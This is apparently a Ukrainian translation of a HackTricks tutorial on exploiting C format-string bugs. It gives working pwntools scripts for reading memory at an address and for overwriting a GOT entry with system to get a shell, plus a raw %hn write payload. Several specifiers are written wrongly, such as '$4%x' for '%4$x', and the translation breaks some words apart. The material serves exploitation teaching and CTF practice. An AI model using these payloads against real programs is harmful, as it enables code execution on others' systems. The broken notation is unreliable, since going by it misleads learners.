.. | ||
format-strings-template.md | ||
README.md |
Форматні рядки
{% hint style="success" %}
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Основна інформація
У C printf
є функція, яка може бути використана для виведення деякого рядка. Перший параметр, який очікує ця функція, - це сирий текст з форматерами. Наступні параметри, які очікуються, - це значення для заміни форматерів з сирого тексту.
Вразливість виникає, коли текст зловмисника використовується як перший аргумент для цієї функції. Зловмисник зможе створити спеціальний вхід, зловживаючи можливостями форматного рядка printf для читання та запису будь-яких даних за будь-якою адресою (читабельна/записувана). Таким чином, маючи можливість виконувати довільний код.
Форматери:
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
Приклади:
- Вразливий приклад:
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
- Нормальне використання:
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
- З відсутніми аргументами:
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
Доступ до вказівників
Формат %<n>$x
, де n
- це число, дозволяє вказати printf вибрати n параметр (з стеку). Отже, якщо ви хочете прочитати 4-й параметр зі стеку, використовуючи printf, ви можете зробити:
printf("%x %x %x %x")
і ви б читали з першого до четвертого параметра.
Або ви могли б зробити:
printf("$4%x")
і безпосередньо прочитати четвертий.
Зверніть увагу, що атакуючий контролює параметр pr
intf
, що в основному означає, що** його введення буде в стеку, коли викликається printf
, що означає, що він може записувати конкретні адреси пам'яті в стек.
{% hint style="danger" %}
Атакуючий, що контролює цей ввід, зможе додати довільну адресу в стек і змусити printf
отримати доступ до них. У наступному розділі буде пояснено, як використовувати цю поведінку.
{% endhint %}
Довільне Читання
Можливо використовувати форматер $n%s
, щоб змусити printf
отримати адресу, що знаходиться в n позиції, слідуючи за нею, і друкувати її так, ніби це рядок (друкувати до тих пір, поки не буде знайдено 0x00). Отже, якщо базова адреса бінарного файлу 0x8048000
, і ми знаємо, що введення користувача починається з 4-ї позиції в стеці, можливо надрукувати початок бінарного файлу з:
from pwn import *
p = process('./bin')
payload = b'%6$p' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
{% hint style="danger" %} Зверніть увагу, що ви не можете поставити адресу 0x8048000 на початку введення, оскільки рядок буде обірвано на 0x00 в кінці цієї адреси. {% endhint %}
Випадкове записування
Форматер $<num>%n
записує кількість записаних байтів в вказану адресу в параметрі <num> в стеку. Якщо зловмисник може записати стільки символів, скільки захоче, за допомогою printf, він зможе змусити $<num>%n
записати випадкове число в випадкову адресу.
На щастя, щоб записати число 9999, не потрібно додавати 9999 "A" до введення, для цього можна використовувати форматер %.<num-write>%<num>$n
, щоб записати число <num-write>
в адресу, на яку вказує позиція num
.
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
Однак, зверніть увагу, що зазвичай для запису адреси, такої як 0x08049724
(що є ВЕЛИЧЕЗНИМ числом для запису одночасно), використовується $hn
замість $n
. Це дозволяє записати лише 2 байти. Тому ця операція виконується двічі: один раз для найвищих 2B адреси і ще раз для найнижчих.
Отже, ця вразливість дозволяє записувати що завгодно в будь-яку адресу (произвольний запис).
У цьому прикладі метою буде перезаписати адресу функції в таблиці GOT, яка буде викликана пізніше. Хоча це може зловживати іншими техніками произвольного запису для виконання:
{% content-ref url="../arbitrary-write-2-exec/" %} arbitrary-write-2-exec {% endcontent-ref %}
Ми будемо перезаписувати функцію, яка отримує свої аргументи від користувача і вказує на функцію system
.
Як згадувалося, для запису адреси зазвичай потрібно 2 кроки: спочатку записується 2 байти адреси, а потім інші 2. Для цього використовується $hn
.
- HOB викликається для 2 вищих байтів адреси
- LOB викликається для 2 нижчих байтів адреси
Потім, через те, як працює формат рядка, вам потрібно спочатку записати найменший з [HOB, LOB] і потім інший.
Якщо HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
Якщо HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
{% code overflow="wrap" %}
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
{% endcode %}
Шаблон Pwntools
Ви можете знайти шаблон для підготовки експлойту для цього типу вразливості в:
{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}
Або цей базовий приклад з тут:
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
Інші приклади та посилання
- https://ir0nstone.gitbook.io/notes/types/stack/format-string
- https://www.youtube.com/watch?v=t1LH9D5cuK4
- https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
- 32 біти, без relro, без canary, nx, без pie, базове використання форматних рядків для витоку прапора зі стеку (немає потреби змінювати потік виконання)
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32 біти, relro, без canary, nx, без pie, форматний рядок для перезапису адреси
fflush
з функцією win (ret2win) - https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
- 32 біти, relro, без canary, nx, без pie, форматний рядок для запису адреси всередині main в
.fini_array
(щоб потік повернувся ще раз) і запису адреси доsystem
в таблиці GOT, що вказує наstrlen
. Коли потік повертається до main,strlen
виконується з введенням користувача і вказує наsystem
, він виконає передані команди.
{% hint style="success" %}
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.